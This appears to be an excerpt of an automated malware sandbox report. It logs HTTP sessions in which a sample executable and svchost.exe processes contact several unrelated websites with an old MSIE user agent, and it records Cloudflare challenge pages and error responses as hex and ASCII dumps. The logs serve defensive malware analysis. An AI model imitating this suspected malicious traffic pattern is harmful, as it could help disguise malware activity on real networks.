2023-03-22 04:45:06 UTC	338	IN	HTTP/1.1 403 Forbidden Date: Wed, 22 Mar 2023 04:45:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Frame-Options: SAMEORIGIN Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K72dAt%2FWEmUAaCRdM3WAlwSVUbyms%2BbVjxvb7oQSNNi3Op6bmbfchCcbvBZFKWoOUK4Rt7TU6pqm7uv1cRUrIGt4lCPYv%2BL5i1ensmJA%2BF1TMTj3JZ1vyAd7kfZL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc8857c8cbbcb-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:06 UTC	339	IN	Data Raw: 31 65 37 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 Data Ascii: 1e7d<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Comp
2023-03-22 04:45:06 UTC	339	IN	Data Raw: 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 Data Ascii: atible" content="IE=Edge"> <meta name="robots" content="noindex,nofollow"> <meta name="viewport" content="width=device-width,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js">
2023-03-22 04:45:06 UTC	341	IN	Data Raw: 67 74 6f 61 2e 63 6f 6d 20 6e 65 65 64 73 20 74 6f 20 72 65 76 69 65 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 6f 66 20 79 6f 75 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 70 72 6f 63 65 65 64 69 6e 67 2e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 52 31 56 38 74 6c 41 56 5a 4d 59 39 4a 31 73 45 4f 46 66 76 6b 6d 4e 49 36 7a 34 4a 75 45 43 37 6d 34 58 6b 41 78 69 64 4c 58 38 2d 31 36 37 39 34 36 30 33 30 36 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 4f 55 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 Data Ascii: gtoa.com needs to review the security of your connection before proceeding. </div> <form id="challenge-form" action="/?__cf_chl_f_tk=R1V8tlAVZMY9J1sEOFfvkmNI6z4JuEC7m4XkAxidLX8-1679460306-0-gaNycGzNCOU" method="POST" enctype="application/x
2023-03-22 04:45:06 UTC	342	IN	Data Raw: 66 64 7a 7a 4e 6e 73 44 54 54 35 58 66 65 64 50 52 72 68 71 45 41 4f 56 4a 67 74 49 54 53 72 6a 52 64 56 74 77 57 4e 6e 46 44 30 79 56 64 61 6b 59 6c 58 30 68 79 48 79 5f 59 56 2d 47 4a 56 44 30 4b 37 72 49 49 59 4f 38 44 6b 30 66 56 4c 39 32 6d 66 6c 4f 69 34 7a 48 2d 30 49 54 47 48 68 42 2d 53 37 4a 38 4c 64 66 43 57 31 59 7a 36 68 44 79 41 34 66 64 4c 36 62 69 37 32 53 72 79 4a 62 67 5a 6e 6e 48 78 6d 56 58 54 71 56 64 46 4f 41 79 6b 67 6b 37 45 4c 57 72 2d 37 6b 7a 41 65 59 68 5a 34 43 31 30 70 63 61 4d 59 35 31 59 54 7a 30 47 73 33 44 65 46 33 72 4a 58 68 34 4d 2d 2d 4e 51 41 6c 57 51 62 4f 7a 48 5a 46 56 44 34 43 30 52 79 54 39 46 4c 73 38 5f 50 74 51 50 6e 30 63 43 30 35 7a 4e 64 6d 5a 6e 76 6e 4e 4b 70 46 39 6a 38 74 72 66 66 36 65 41 33 7a 78 4c Data Ascii: fdzzNnsDTT5XfedPRrhqEAOVJgtITSrjRdVtwWNnFD0yVdakYlX0hyHy_YV-GJVD0K7rIIYO8Dk0fVL92mflOi4zH-0ITGHhB-S7J8LdfCW1Yz6hDyA4fdL6bi72SryJbgZnnHxmVXTqVdFOAykgk7ELWr-7kzAeYhZ4C10pcaMY51YTz0Gs3DeF3rJXh4M--NQAlWQbOzHZFVD4C0RyT9FLs8_PtQPn0cC05zNdmZnvnNKpF9j8trff6eA3zxL
2023-03-22 04:45:06 UTC	343	IN	Data Raw: 20 27 73 69 67 74 6f 61 2e 63 6f 6d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4e 6f 75 6e 63 65 3a 20 27 34 39 31 30 35 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 52 61 79 3a 20 27 37 61 62 62 63 38 38 35 37 63 38 63 62 62 63 62 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 38 66 31 62 38 65 65 34 65 35 62 33 35 66 36 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 52 31 56 38 74 6c 41 56 5a 4d 59 39 4a 31 73 45 4f 46 66 76 6b 6d 4e 49 36 7a 34 4a 75 45 43 37 6d 34 58 6b 41 78 69 64 4c 58 38 2d 31 36 37 39 34 36 30 33 30 36 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 4f Data Ascii: 'sigtoa.com', cType: 'managed', cNounce: '49105', cRay: '7abbc8857c8cbbcb', cHash: '8f1b8ee4e5b35f6', cUPMDTk: "\/?__cf_chl_tk=R1V8tlAVZMY9J1sEOFfvkmNI6z4JuEC7m4XkAxidLX8-1679460306-0-gaNycGzNCO
2023-03-22 04:45:06 UTC	345	IN	Data Raw: 70 33 53 36 37 63 4b 6c 58 73 69 2b 42 38 39 51 49 57 4a 68 35 79 49 38 57 69 44 6c 36 66 49 61 42 6f 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 31 3a 20 27 62 62 35 49 31 45 7a 6e 79 4c 53 39 44 63 57 4a 75 55 45 4a 6a 41 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 4a 50 54 6f 30 36 2f 79 61 32 74 38 50 38 77 6a 55 43 38 5a 34 51 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 6f 34 34 57 Data Ascii: p3S67cKlXsi+B89QIWJh5yI8WiDl6fIaBo=', i1: 'bb5I1EznyLS9DcWJuUEJjA==', i2: 'JPTo06/ya2t8P8wjUC8Z4Q==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3o44W
2023-03-22 04:45:06 UTC	346	IN	Data Raw: 7a 34 4a 75 45 43 37 6d 34 58 6b 41 78 69 64 4c 58 38 2d 31 36 37 39 34 36 30 33 30 36 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 4f 55 22 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 Data Ascii: z4JuEC7m4XkAxidLX8-1679460306-0-gaNycGzNCOU" + window._cf_chl_opt.cOgUHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendChild
2023-03-22 04:45:06 UTC	347	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.5	62444	138.201.65.187	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	336	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: www.diamir.de
2023-03-22 04:45:06 UTC	347	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Wed, 22 Mar 2023 04:45:06 GMT Content-Type: text/html Content-Length: 548 Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
2023-03-22 04:45:06 UTC	347	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.5	62415	172.67.156.49	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	348	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: orlyhotel.com Cookie: django_language=en
2023-03-22 04:45:07 UTC	564	IN	HTTP/1.1 500 Internal Server Error Date: Wed, 22 Mar 2023 04:45:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: max-age=0, no-store, no-cache, must-revalidate Expires: Wed, 22 Mar 2023 04:34:59 GMT Content-Language: en Last-Modified: Wed, 22 Mar 2023 04:34:59 GMT X-Frame-Options: SAMEORIGIN Vary: Accept-Language CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TIJKQkauURkOoJkkGoPFAM1s%2Fizv0g9pVuIiaeG5kNMh0MqQ8u8be2cw5Q%2F8eszJW8hf%2FHY%2BgeQy3LbClSY6XfEeqMSqW0v0P%2FypOA6feh0XGDispNG1YZaJ3sXC9h0z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc885bf0a2c46-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:07 UTC	564	IN	Data Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a Data Ascii: 1b<h1>Server Error (500)</h1>
2023-03-22 04:45:07 UTC	564	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.5	62417	91.229.22.126	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	348	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: pleszew.policja.gov.pl
2023-03-22 04:45:06 UTC	463	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 22 Mar 2023 04:45:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding
2023-03-22 04:45:06 UTC	495	IN	Data Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65 Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
2023-03-22 04:45:07 UTC	530	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 44 61 74 61 20 70 75 62 6c 69 6b 61 63 6a 69 3a 20 3c 2f 73 70 61 6e 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 30 33 2e 31 30 2e 32 30 32 32 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 32 30 30 30 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f Data Ascii: <span class="sr-only">Data publikacji: </span><i class="fa fa-clock-o" aria-hidden="true"></i> 03.10.2022 </div>2000 </div> </article> </section> </section></div>... topnews. -->... co
2023-03-22 04:45:07 UTC	546	IN	Data Raw: 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 0d 0a 31 30 30 30 0d 0a 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 Data Ascii: :10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?v=1657112618" alt="Zo1000sta jednym z nas - PRACA W POLICJI" /></a></div><div class="item" style="width:300px;
2023-03-22 04:45:07 UTC	562	IN	Data Raw: 77 65 72 73 6a 65 20 70 6f 72 74 61 6c 75 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 77 61 69 22 20 74 69 74 6c 65 3d 22 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 22 20 63 6c 61 73 73 3d 22 77 61 69 22 3e 3c 73 70 61 6e 3e 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0d 0a 31 38 33 0d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 Data Ascii: wersje portalu</h2> <a href="/w20/wai" title="wersja tekstowa" class="wai"><span>wersja tekstowa</span></a><br /> </li> </ul>183 <div class="clear"></div> </div> </div>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	50205	188.114.96.3	443	C:\Users\user\Desktop\6gjnnBAbpc.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:44:27 UTC	52	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: sigtoa.com
2023-03-22 04:44:27 UTC	52	IN	HTTP/1.1 403 Forbidden Date: Wed, 22 Mar 2023 04:44:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Frame-Options: SAMEORIGIN Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wLueudhuaEpl%2B1qRk7O11Mpv%2BRakvM%2B4TOl3LhEHzjrAN%2BIux1LFRle4xMagFQArK8pZounJy9j11f2N0x22phDEW7b%2FL97UGkKfIgGl0H%2BmMb0GAcWJOmdQzyOS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc7914803360c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:44:27 UTC	53	IN	Data Raw: 31 65 37 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d Data Ascii: 1e7d<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-
2023-03-22 04:44:27 UTC	54	IN	Data Raw: 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e Data Ascii: Compatible" content="IE=Edge"> <meta name="robots" content="noindex,nofollow"> <meta name="viewport" content="width=device-width,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js">
2023-03-22 04:44:27 UTC	55	IN	Data Raw: 20 20 73 69 67 74 6f 61 2e 63 6f 6d 20 6e 65 65 64 73 20 74 6f 20 72 65 76 69 65 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 6f 66 20 79 6f 75 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 70 72 6f 63 65 65 64 69 6e 67 2e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 48 4d 49 48 33 32 5f 59 4b 5a 33 32 50 5f 67 47 53 70 49 4f 75 78 2e 42 4c 55 4a 32 6d 56 50 66 42 39 4a 68 79 66 69 5f 70 79 51 2d 31 36 37 39 34 36 30 32 36 37 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 4f 55 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 Data Ascii: sigtoa.com needs to review the security of your connection before proceeding. </div> <form id="challenge-form" action="/?__cf_chl_f_tk=HMIH32_YKZ32P_gGSpIOux.BLUJ2mVPfB9Jhyfi_pyQ-1679460267-0-gaNycGzNCOU" method="POST" enctype="applicati
2023-03-22 04:44:27 UTC	56	IN	Data Raw: 36 76 72 50 48 61 69 51 77 63 6e 79 6c 44 37 59 31 62 76 6d 50 6a 71 52 6f 5f 6d 70 2d 35 6b 4b 59 38 30 57 61 35 72 66 6e 38 5a 58 79 55 79 66 54 70 2d 6e 7a 76 74 4d 74 75 4b 38 6d 42 42 6d 33 47 56 5f 4d 78 48 76 51 56 35 59 76 38 48 79 4a 2d 62 31 4a 75 42 72 4e 4f 47 6e 41 67 73 59 6f 79 34 4a 64 63 58 4a 54 59 75 79 56 56 55 63 57 54 73 74 73 31 57 54 7a 4f 64 71 38 5a 5a 48 68 38 6c 77 66 4e 65 68 2d 79 59 70 55 79 39 71 54 61 49 57 59 73 5f 4c 30 4b 33 47 4e 70 4c 6f 50 58 74 7a 62 72 42 6d 6f 59 59 78 37 38 5f 30 61 65 69 53 4a 74 57 74 33 71 48 30 62 6c 37 65 79 34 4f 4a 45 4c 76 74 6a 49 6a 41 58 2d 4c 4c 38 48 6e 79 39 55 4e 79 6b 6e 6f 68 57 64 38 57 78 64 30 61 4d 74 42 33 66 4f 6e 59 59 6a 50 35 31 2d 58 44 55 33 4f 6d 33 45 72 50 34 74 76 Data Ascii: 